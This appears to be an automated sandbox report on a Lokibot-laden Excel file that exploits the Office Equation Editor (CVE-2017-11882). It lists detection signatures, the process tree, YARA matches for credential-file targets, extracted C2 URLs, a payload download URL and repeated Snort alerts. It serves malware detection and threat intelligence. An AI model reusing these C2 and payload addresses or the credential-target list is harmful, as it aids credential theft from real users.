Windows Analysis Report
_2201S_BUSAN_HOCHIMINH_.xlsx

Overview

General Information

Sample Name: _2201S_BUSAN_HOCHIMINH_.xlsx
Analysis ID: 569962
MD5: cf8b307caa943326ee808bb3cb02deee
SHA1: 705c25adbdb7b805e47566540b3804eba178e7da
SHA256: cbe84e2c523fd51dabb1365df50415ffc51f8159c36798061742f08ba5d31b9b
Tags: Loki, VelvetSweatshop, xlsx
Infos:

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Yara detected Lokibot
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Searches the installation path of Mozilla Firefox
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2580 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2984 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1712 cmdline: "C:\Users\Public\vbc.exe" MD5: 7DF1896047D9647D818080DD17563D92)
      • xmtxpy.exe (PID: 2260 cmdline: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd MD5: 1EACD504E4461F9EE286715997D8A9EE)
        • xmtxpy.exe (PID: 2556 cmdline: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd MD5: 1EACD504E4461F9EE286715997D8A9EE)
  • cleanup
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
Source | Rule | Description | Author | Strings
00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_GENInfoStealer | Detects executables containing common artifcats observed in infostealers | ditekSHen
  • 0x17936:$f1: FileZilla\recentservers.xml
  • 0x17976:$f2: FileZilla\sitemanager.xml
  • 0x15be6:$b2: Mozilla\Firefox\Profiles
  • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  • 0x15afa:$s4: logins.json
  • 0x169a4:$s6: wand.dat
  • 0x15424:$a1: username_value
  • 0x15414:$a2: password_value
  • 0x15a5f:$a3: encryptedUsername
  • 0x15acc:$a3: encryptedUsername
  • 0x15a72:$a4: encryptedPassword
  • 0x15ae0:$a4: encryptedPassword
00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Loki_1 | Loki Payload | kevoreilly
  • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x153fc:$a2: last_compatible_version
Source | Rule | Description | Author | Strings
6.2.xmtxpy.exe.400000.0.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
6.2.xmtxpy.exe.400000.0.raw.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
6.2.xmtxpy.exe.400000.0.raw.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
6.2.xmtxpy.exe.400000.0.raw.unpack | INDICATOR_SUSPICIOUS_GENInfoStealer | Detects executables containing common artifcats observed in infostealers | ditekSHen
  • 0x17936:$f1: FileZilla\recentservers.xml
  • 0x17976:$f2: FileZilla\sitemanager.xml
  • 0x15be6:$b2: Mozilla\Firefox\Profiles
  • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  • 0x15afa:$s4: logins.json
  • 0x169a4:$s6: wand.dat
  • 0x15424:$a1: username_value
  • 0x15414:$a2: password_value
  • 0x15a5f:$a3: encryptedUsername
  • 0x15acc:$a3: encryptedUsername
  • 0x15a72:$a4: encryptedPassword
  • 0x15ae0:$a4: encryptedPassword
6.2.xmtxpy.exe.400000.0.raw.unpack | Loki_1 | Loki Payload | kevoreilly
  • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x153fc:$a2: last_compatible_version

              Exploits

              Source: Network Connection, Author: Joe Security, Data: DestinationIp: 198.46.132.195, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2984, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
              Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2984, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe

              System Summary

              Source: Process started, Author: Florian Roth, Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2984, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 1712
              Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 1B 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2984, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

              AV Detection

              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
              Source: _2201S_BUSAN_HOCHIMINH_.xlsx, Virustotal: Detection: 35%
              Source: _2201S_BUSAN_HOCHIMINH_.xlsx, ReversingLabs: Detection: 32%
              Source: http://198.46.132.195/windowSSH/.win32.exe, Avira URL Cloud: Label: malware
              Source: http://asiaoil.bar//bobby/five/fre.php, Avira URL Cloud: Label: malware
              Source: http://198.46.132.195/windowSSH/.win32.exe, Virustotal: Detection: 7%
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe, Virustotal: Detection: 21%
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe, ReversingLabs: Detection: 23%
              Source: C:\Users\Public\vbc.exe, Joe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe, Joe Sandbox ML: detected

              Exploits

              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
              Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: wntdll.pdb source: xmtxpy.exe, 00000005.00000003.463241268.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, xmtxpy.exe, 00000005.00000003.461526742.00000000023E0000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_00405D7C FindFirstFileA,FindClose,4_2_00405D7C
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_004053AA
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_00402630 FindFirstFileA,4_2_00402630
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe, Code function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,6_2_00403D74
              Source: global traffic, DNS query: name: asiaoil.bar
              Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 198.46.132.195:80
              Source: excel.exe, Memory has grown: Private usage: 5MB later: 61MB

              Networking

              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49205 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49205 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49205 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49205 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49206 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49206 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49206 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49206 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49207 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49207 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49207 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49207 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49208 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49208 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49208 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49208 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49209 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49209 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49209 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49209 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49210 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49210 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49210 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49210 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49211 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49211 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49211 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49211 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49212 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49212 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49212 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49212 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49213 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49213 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49213 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49213 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49214 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49214 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49214 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49214 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49215 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49215 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49215 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49215 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49216 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49216 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49216 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49216 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49217 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49217 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49217 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49217 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49218 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49218 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49218 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49218 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49219 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49219 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49219 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49219 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49220 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49220 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49220 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49220 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49221 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49221 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49221 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49221 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49222 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49222 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49222 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49222 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49223 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49223 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49223 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49223 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49224 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49224 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49224 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49224 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49225 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49225 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49225 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49225 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49226 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49226 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49226 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49226 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49227 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49227 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49227 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49227 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49228 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49228 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49228 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49228 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49229 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49229 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49229 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49229 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49230 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49230 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49230 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49230 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49231 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49231 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49231 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49231 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49232 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49232 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49232 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49232 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49234 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49234 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49234 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49234 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49235 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49235 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49235 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49235 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49236 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49236 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49236 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49236 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49237 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49237 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49237 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49237 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49238 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49238 -> 172.67.197.66:80
